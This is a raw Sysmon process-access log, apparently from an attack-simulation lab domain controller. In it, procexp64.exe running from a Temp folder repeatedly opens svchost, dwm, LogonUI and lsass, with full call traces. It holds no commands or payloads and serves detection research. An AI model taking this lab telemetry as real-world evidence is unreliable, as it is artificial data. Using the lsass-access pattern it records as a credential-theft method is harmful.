15:16:36.845{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789752Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.845{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789751Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.845{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789750Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.845{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789749Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.845{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789748Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.845{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789747Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.845{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789746Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.845{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789745Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.845{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789744Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.845{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789743Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.845{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789742Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.845{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789741Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.845{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789740Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.845{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789739Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.845{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789738Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.845{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789737Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.845{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789736Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.845{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789735Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.845{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789734Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.845{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789733Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.845{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789732Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.845{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789731Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.845{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789730Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.845{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789729Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 